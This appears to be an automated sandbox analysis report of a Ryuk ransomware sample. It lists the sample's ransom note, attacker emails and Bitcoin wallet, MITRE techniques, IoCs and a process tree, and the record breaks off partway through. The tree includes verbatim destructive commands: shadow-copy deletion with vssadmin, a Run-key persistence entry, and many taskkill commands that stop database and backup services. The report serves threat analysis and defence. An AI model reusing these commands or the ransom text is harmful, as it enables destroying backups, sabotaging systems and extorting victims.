ryuk | 831a54f66b7645119d642dab565d86f4316752f6f2f759f9cc10737a34032ebf

Analysis

max time kernel
126s
max time network
21s
platform
windows7_x64
resource
win7v20210408
submitted
17-04-2021 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

svchost.exe

Score

10^/10

ryuk persistence ransomware

Malware Config

Extracted

Path

C:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails eliasmarco@tutanota.com or CamdenScott@protonmail.com BTC wallet: 15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj Ryuk No system is safe

Emails

eliasmarco@tutanota.com

CamdenScott@protonmail.com

Wallets

15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 1 IoCs

Processes:

aCBlj.exe

pid process

1688 aCBlj.exe
Deletes itself 1 IoCs

Processes:

aCBlj.exe

pid process

1688 aCBlj.exe
Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

1240 svchost.exe

pid	process
1688	aCBlj.exe

pid	process
1688	aCBlj.exe

pid	process
1240	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\aCBlj.exe"	reg.exe

Enumerates connected drives 3 TTPs 8 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1652 set thread context of 1240 1652 svchost.exe svchost.exe

description	pid	process	target process
PID 1652 set thread context of 1240	1652	svchost.exe	svchost.exe

Drops file in Program Files directory 64 IoCs

Processes:

taskhost.exeDwm.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF	Dwm.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml	Dwm.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo	Dwm.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png	Dwm.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\RMNSQUE.INF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48B.GIF	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\HEADINGBB.POC	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Tags.accft	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay	Dwm.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49B.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_COL.HXC	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml	taskhost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Aspect.thmx	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF	Dwm.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png	taskhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2152	vssadmin.exe
1804	vssadmin.exe
1724	vssadmin.exe
3052	vssadmin.exe
1776	vssadmin.exe
2280	vssadmin.exe
652	vssadmin.exe
1784	vssadmin.exe
2696	vssadmin.exe
1656	vssadmin.exe
2112	vssadmin.exe
2388	vssadmin.exe
2304	vssadmin.exe
1580	vssadmin.exe
2348	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2264	taskkill.exe
2508	taskkill.exe
2544	taskkill.exe
2876	taskkill.exe
2924	taskkill.exe
2108	taskkill.exe
2956	taskkill.exe
1668	taskkill.exe
556	taskkill.exe
2152	taskkill.exe
2336	taskkill.exe
2600	taskkill.exe
2816	taskkill.exe
1404	taskkill.exe
1468	taskkill.exe
1792	taskkill.exe
328	taskkill.exe
2068	taskkill.exe
2756	taskkill.exe
616	taskkill.exe
1896	taskkill.exe
1840	taskkill.exe
540	taskkill.exe
2380	taskkill.exe
2420	taskkill.exe
2628	taskkill.exe
1596	taskkill.exe
876	taskkill.exe
1244	taskkill.exe
2708	taskkill.exe
2944	taskkill.exe
2496	taskkill.exe
2764	taskkill.exe
2288	taskkill.exe
664	taskkill.exe
3000	taskkill.exe
2208	taskkill.exe
2296	taskkill.exe
2460	taskkill.exe
3028	taskkill.exe
2272	taskkill.exe
2016	taskkill.exe
2060	taskkill.exe
1372	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

aCBlj.exe

pid process

1688 aCBlj.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

aCBlj.exe

pid process

1688 aCBlj.exe

pid	process
1688	aCBlj.exe

pid	process
1688	aCBlj.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1372	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	2944	taskkill.exe
Token: SeDebugPrivilege	2600	taskkill.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	2816	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	1688	aCBlj.exe
Token: SeBackupPrivilege	1312	vssvc.exe
Token: SeRestorePrivilege	1312	vssvc.exe
Token: SeAuditPrivilege	1312	vssvc.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

taskhost.exe

pid process

1124 taskhost.exe

pid	process
1124	taskhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

svchost.exesvchost.exeaCBlj.exe

description	pid	process	target process
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1652 wrote to memory of 1240	1652	svchost.exe	svchost.exe
PID 1240 wrote to memory of 1688	1240	svchost.exe	aCBlj.exe
PID 1240 wrote to memory of 1688	1240	svchost.exe	aCBlj.exe
PID 1240 wrote to memory of 1688	1240	svchost.exe	aCBlj.exe
PID 1240 wrote to memory of 1688	1240	svchost.exe	aCBlj.exe
PID 1688 wrote to memory of 1372	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1372	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1372	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 876	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 876	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 876	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1468	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1468	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1468	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1896	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1896	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1896	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1840	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1840	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1840	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 664	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 664	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 664	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 616	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 616	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 616	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1244	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1244	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1244	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1668	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1668	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1668	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 540	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 540	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 540	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1792	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1792	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 1792	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 328	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 328	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 328	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2068	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2068	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2068	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2152	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2152	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2152	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2208	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2208	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2208	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2264	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2264	1688	aCBlj.exe	taskkill.exe
PID 1688 wrote to memory of 2264	1688	aCBlj.exe	taskkill.exe

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Drops file in Program Files directory
PID:1184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:2664

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2696

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:3052

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1656

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1776

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:2280

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2112

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1804

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:2876

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1724

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2388

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:2348

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2152

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:652

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2304

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1580

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1784

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1652

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1240

C:\users\Public\aCBlj.exe
"C:\users\Public\aCBlj.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe
3⤵
- Executes dropped EXE
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM excel.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
